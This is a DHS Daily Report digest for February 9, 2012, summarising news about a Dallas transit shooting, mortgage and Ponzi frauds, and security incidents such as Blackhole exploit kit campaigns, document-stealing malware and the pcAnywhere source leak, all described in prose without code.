Thursday, February 9, 2012

Complete DHS Daily Report for February 9, 2012

Daily Report

Top Stories

• A shooting suspect shot three people, killing one, at a Dallas Area Rapid Transit bus station before he was shot and killed by police. – CNN (See item 14)

14. February 8, CNN – (Texas) Suspect, victim die in Texas transit shooting. A shooting suspect and one of three people he shot at a Dallas Area Rapid Transit (DART) station just north of Dallas have died of their wounds, officials said. The shootings happened February 7 at the Arapaho station in Richardson, Texas, a DART spokesman said. “A DART female officer had been alerted by a bus operator about an issue with a customer, so she went to the station to meet the bus,” he said. “Meanwhile, a second bus pulled into the station and that operator also indicated they had someone attempting to board the bus that was being unruly. The suspect got off the bus and started walking towards the train station. When our officer approached him, he started firing.” The DART officer received non-life threatening gunshots to her bulletproof vest and her arm. Two male passengers also were shot. One later died. A Richardson police spokesman said during a news conference that it was unclear if the victims were hit by crossfire or were targeted by the gunman. Several dozen people were evacuated from the DART station.Source:

• Symantec confirmed February 7 the pcAnywhere source code published on the Web February 6 by hackers who tried to extort $50,000 from the company was legitimate, and said it expected the rest of the code stolen in 2006 to be made public. – Computerworld. See item 35 below in the Information Technology Sector.


Banking and Finance Sector

11. February 8, Pittsburgn Post-Gazette – (Pennsylvania) Police unsure why driver crashed through doors of PNC’s Firstside Center. Police in Pittsburgh continued to search for the driver of a stolen sports utility vehicle (SUV) that crashed into a PNC Bank branch February 7, drawing a bomb squad. The man drove the vehicle onto the steps of the building and into its glass front doors about 2 p.m., police said. Witnesses said the suspect ran away, possibly darting into a nearby building. The commotion prompted police to clear and cordon off 3-block stretch for more than 2 hours while a bomb squad examined the vehicle with a robot. Bomb technicians found no explosives. Many people inside the building did not leave, but moved to rooms in the back. Police are still investigating a motive. A police commander said his detectives did not know if the crash was an accident or if the bank was targeted. The SUV was apparently stolen earlier in the day from the Parkway Center Mall in Green Tree, the commander said. Source:

12. February 8, San Francisco Chronicle – (California) Plea deals made in Calif. mortgage scheme. Four defendants have pleaded guilty to charges related to a mortgage loan scheme that involved at least 20 northern Californian properties and lined the defendants’ pockets with more than $20 million, federal investigators announced February 8. Through an arrangement with two real estate agents that lasted from 2002 to 2007, a couple secured 63 loans on properties purchased through straw buyers, court documents said. The couple also admitted to owning and operating numerous residential care facilities that employed illegal immigrants. The California Department of Social Services barred the couple from operating care facilities in 1998 because of licensing violations, but the couple continued to operate the facilities by using buyers paid to purchase the properties and then sign grant deeds that transferred title to the wife, court documents said. The couple pleaded guilty to charges of bank fraud, tax evasion, and harboring illegal aliens, and are responsible for $5.2 million in restitution. A real estate agent, who pleaded guilty to charges of bank fraud and monetary transactions using criminally derived property, is responsible for $2.8 million of that sum. Prosecutors said the other agent will have to pay about $300,000. The maximum sentence for bank fraud is 30 years in prison and a $1 million fine. Source:

13. February 7, Detroit Free Press – (Michigan; International) Man held on Ponzi scheme charges. An Iraqi citizen and former Dearborn, Michigan resident is in custody on federal charges he operated a Ponzi scheme that allegedly bilked investors, mostly Iraqi-Americans, out of $58 million, the U.S. attorney’s office said February 6. Authorities said the man promised big returns on rebuilding projects in Iraq, but instead used investors’ money to repay earlier investors. He fled to the Middle East after investors discovered the scheme. More than 100 sued him in federal court in Detroit in 2010. The U.S. attorney’s office said he was arrested at Detroit Metro Airport February 3. Source:

For another story, see item 33 below in the Information Technology Sector.

Information Technology

30. February 8, Help Net Security – (International) More bogus ad-serving Android apps evade Google’s Bouncer. Users searching for games on the official Android Market have been heavily targeted by ad-pushing scammers lately. First it was the fake Temple Run app, and now a string of bogus copies of popular iPhone games supposedly developed by Rovio Mobile Ltd, the developers of the famous Angry Birds game. Some of these games are offered by other developers — mostly on Apple’s iPhone Apps Store — and some do not even exist, but the scammers are trying to take advantage of the fact Angry Birds’ developer Rovio has become a well known and trusted name. The scammers were able to register their account under Rovio Mobile by using a capital “I” instead of a lowercase “L” in “Mobile,” and the result is a legitimate looking account. Once the user tries to install any of the apps, she is faced with an image taken from the original app and instructions to follow a link to complete the process and to unlock the “full version.” However, the link leads to a Web page hosting advertisements for diet pills, and entices the users to sign in to find out how they can get three bottles of pills for free. Source:

31. February 8, Softpedia – (International) Malware steals documents and uploads them to Sendspace. Security experts came across a piece of malware programmed to steal documents from the infected computer. The malicious element is designed to upload the obtained Microsoft Word and Excel files to the hosting site Trend Micro researchers said Sendspace was used previously to store stolen data because the service allowed crooks to “send, receive, track and share” big files, but the process was never done automatically by malware. The infection begins with an executable file called Fedex_Invoice(dot)exe, identified as TROJ_DOFOIL.GE, the file’s name hinting it may be spread with the use of a fake “FedEx failed delivery” spam campaign. Once the file is executed, it downloads and executes TSPY_SPCESEND.A, a trojan that searches the local drive for Word and Excel documents, collecting them in a password-protected archive placed in the user’s temporary folder. After the archive is created, it is uploaded to Sendspace, its download link transmitted to the malware’s command and control (C&C) server. This way the crooks do not have to store all the files on the C&C, instead they access them from the file hosting service. This discovery means information theft and exfiltration are not specific only for targeted attacks, but they are present in mass campaigns as well. Source:

32. February 8, Threatpost – (International) Attackers using fake Google Analytics code to redirect users to Black Hole Exploit Kit. Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze, or so it appears, legitimate code. The latest instance of this technique has seen attackers employing code meant to look like Google Analytics snippets, but instead sends victims off to a remote site hosting the Black Hole Exploit Kit. Researchers at Websense discovered the ongoing attack recently, and found the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it is referring to common domains. Source:

33. February 8, Softpedia – (International) Blackhole toolkit served by spam ahead of tax season. Symantec researchers came across a large number of spam messages that try to trick the recipient into clicking on a link that points to the Blackhole toolkit. More than 200 unique URLs were identified in a series of e-mails that urge users to verify their accounts after some discrepancies were identified by the sender company. The phony e-mails, apparently coming from a legitimate company, read: “With intent to assure that the exact information is being sustained on our systems, as well as to improve the quality of service we can provide to you; [COMPANY NAME] has participated in the Internal Revenue Service [IRS] Name and TIN Matching Program. We have found out, that your name and/or TIN, that we have on your account is different from the information on file with the Social Security Administration. In order to verify your account, please enter the secure section.” Once the link is clicked, the user is taken to a page containing more links that point to a JavaScript file called js.js. This file serves the Blackhole toolkit looking for various vulnerabilities on the victim’s computer, the final payload being identified as Trojan.Zbot. The domains that contain the malicious JavaScript file are not only newly registered domains, but also legitimate domains that were hijacked by the cybercriminals that launched the campaign. Users are advised not to click on links that come with a suspicious looking e-mail, but also to avoid opening attachments, especially if they are represented by exe, zip, or pdf files. Source:

34. February 7, Computerworld – (International) Adobe sets IE as next target in Flash security work. Adobe plans to tackle Microsoft’s Internet Explorer (IE) in its ongoing work to “sandbox” its popular Flash Player within browsers, Adobe’s head of security said February 7. On February 6, Adobe released a beta version of a sandboxed Flash Player plug-in for Mozilla’s Firefox on Windows Vista and Windows 7 as a follow-up to a similar initiative in 2010 for Google’s Chrome. Next on the list is IE. “IE has a big chunk of the user base,” said Adobe’s senior director of security, products, and services. “We want to do what protects the most users the fastest.” According to Web metrics company Net Applications, IE accounted for 53 percent of all browsers used last in January worldwide, or more than double Firefox’s 21 percent, and almost triple Chrome’s 19 percent. Adobe’s head of security declined to set a timetable for putting Flash within a sandbox inside IE. Source:

35. February 7, Computerworld – (International) Symantec expects Anonymous to publish more stolen source code. On February 7, Symantec confirmed the pcAnywhere source code published on the Web February 6 by hackers who tried to extort $50,000 from the company was legitimate. A company spokesman also said Symantec expects the rest of the source code stolen from its network in 2006 will also be made public. Symantec’s acknowledgement followed the appearance late February 6 of a 1.3GB file on various file-sharing Web sites that claimed to be the source code of the pcAnywhere remote-access software. The Anonymous hacking group claimed responsibility for posting the pcAnywhere source code. Also February 6, an individual or group going by the name “Yama Tough” published a series of e-mails on Pastebin that detailed an attempt to extort $50,000 from Symantec. Source:

36. February 7, H Security – (International) Trustwave issued a man-in-the-middle certificate. Certificate authority Trustwave issued a certificate to a company allowing it to issue valid certificates for any server. This enabled the company to listen in on encrypted traffic sent and received by its staff using services such as Google and Hotmail. Trustwave has since revoked the CA certificate and vowed to refrain from issuing such certificates in the future. According to Trustwave, the CA certificate was used in a data loss prevention (DLP) system, intended to prevent confidential information such as company secrets from escaping. The DLP system monitored encrypted connections by acting as a man-in-the-middle, meaning it tapped into the connection and fooled the browser or e-mail client into thinking it was communicating with the intended server. To prevent certificate errors, the DLP system had to be able tproduce a valid certificate for each connection — the Trustwave CA certificate enableit to issue such certificates itself. Source:

Communications Sector

See items 30 and 36 above in the Information Technology Sector